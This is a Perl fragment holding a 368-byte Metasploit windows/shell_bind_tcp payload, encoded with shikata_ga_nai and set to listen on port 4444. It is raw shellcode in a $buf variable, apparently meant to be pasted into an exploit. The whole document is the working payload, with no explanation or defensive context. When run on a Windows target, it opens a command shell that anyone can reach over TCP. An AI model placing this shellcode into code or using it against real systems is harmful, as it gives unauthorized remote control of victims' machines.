# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=, 
# AutoRunScript=
our $buf = 
"\x29\xc9\xb1\x56\xda\xd5\xba\xd2\xc6\xc5\x5a\xd9\x74\x24" .
"\xf4\x5e\x83\xee\xfc\x31\x56\x10\x03\x56\xc2\x24\x30\xa6" .
"\x0a\x21\xbb\x57\xca\x52\x35\xb2\xfb\x40\x21\xb6\xa9\x54" .
"\x21\x9a\x41\x1e\x67\x0f\xd2\x52\xa0\x20\x53\xd8\x96\x0f" .
"\x64\xec\x16\xc3\xa6\x6e\xeb\x1e\xfa\x50\xd2\xd0\x0f\x90" .
"\x13\x0c\xff\xc0\xcc\x5a\xad\xf4\x79\x1e\x6d\xf4\xad\x14" .
"\xcd\x8e\xc8\xeb\xb9\x24\xd2\x3b\x11\x32\x9c\xa3\x1a\x1c" .
"\x3d\xd5\xcf\x7e\x01\x9c\x64\xb4\xf1\x1f\xac\x84\xfa\x11" .
"\x90\x4b\xc5\x9d\x1d\x95\x01\x19\xfd\xe0\x79\x59\x80\xf2" .
"\xb9\x23\x5e\x76\x5c\x83\x15\x20\x84\x35\xfa\xb7\x4f\x39" .
"\xb7\xbc\x08\x5e\x46\x10\x23\x5a\xc3\x97\xe4\xea\x97\xb3" .
"\x20\xb6\x4c\xdd\x71\x12\x23\xe2\x62\xfa\x9c\x46\xe8\xe9" .
"\xc9\xf1\xb3\x65\x3e\xcc\x4b\x76\x28\x47\x3f\x44\xf7\xf3" .
"\xd7\xe4\x70\xda\x20\x0a\xab\x9a\xbf\xf5\x53\xdb\x96\x31" .
"\x07\x8b\x80\x90\x27\x40\x51\x1c\xf2\xc7\x01\xb2\xac\xa7" .
"\xf1\x72\x1c\x40\x18\x7d\x43\x70\x23\x57\xf2\xb6\xed\x83" .
"\x57\x51\x0c\x34\x46\xfd\x99\xd2\x02\xed\xcf\x4d\xba\xcf" .
"\x2b\x46\x5d\x2f\x1e\xfa\xf6\xa7\x16\x14\xc0\xc8\xa6\x32" .
"\x63\x64\x0e\xd5\xf7\x66\x8b\xc4\x08\xa3\xbb\x8f\x31\x24" .
"\x31\xfe\xf0\xd4\x46\x2b\x62\x74\xd4\xb0\x72\xf3\xc5\x6e" .
"\x25\x54\x3b\x67\xa3\x48\x62\xd1\xd1\x90\xf2\x1a\x51\x4f" .
"\xc7\xa5\x58\x02\x73\x82\x4a\xda\x7c\x8e\x3e\xb2\x2a\x58" .
"\xe8\x74\x85\x2a\x42\x2f\x7a\xe5\x02\xb6\xb0\x36\x54\xb7" .
"\x9c\xc0\xb8\x06\x49\x95\xc7\xa7\x1d\x11\xb0\xd5\xbd\xde" .
"\x6b\x5e\xcd\x94\x31\xf7\x46\x71\xa0\x45\x0b\x82\x1f\x89" .
"\x32\x01\x95\x72\xc1\x19\xdc\x77\x8d\x9d\x0d\x0a\x9e\x4b" .
"\x31\xb9\x9f\x59";
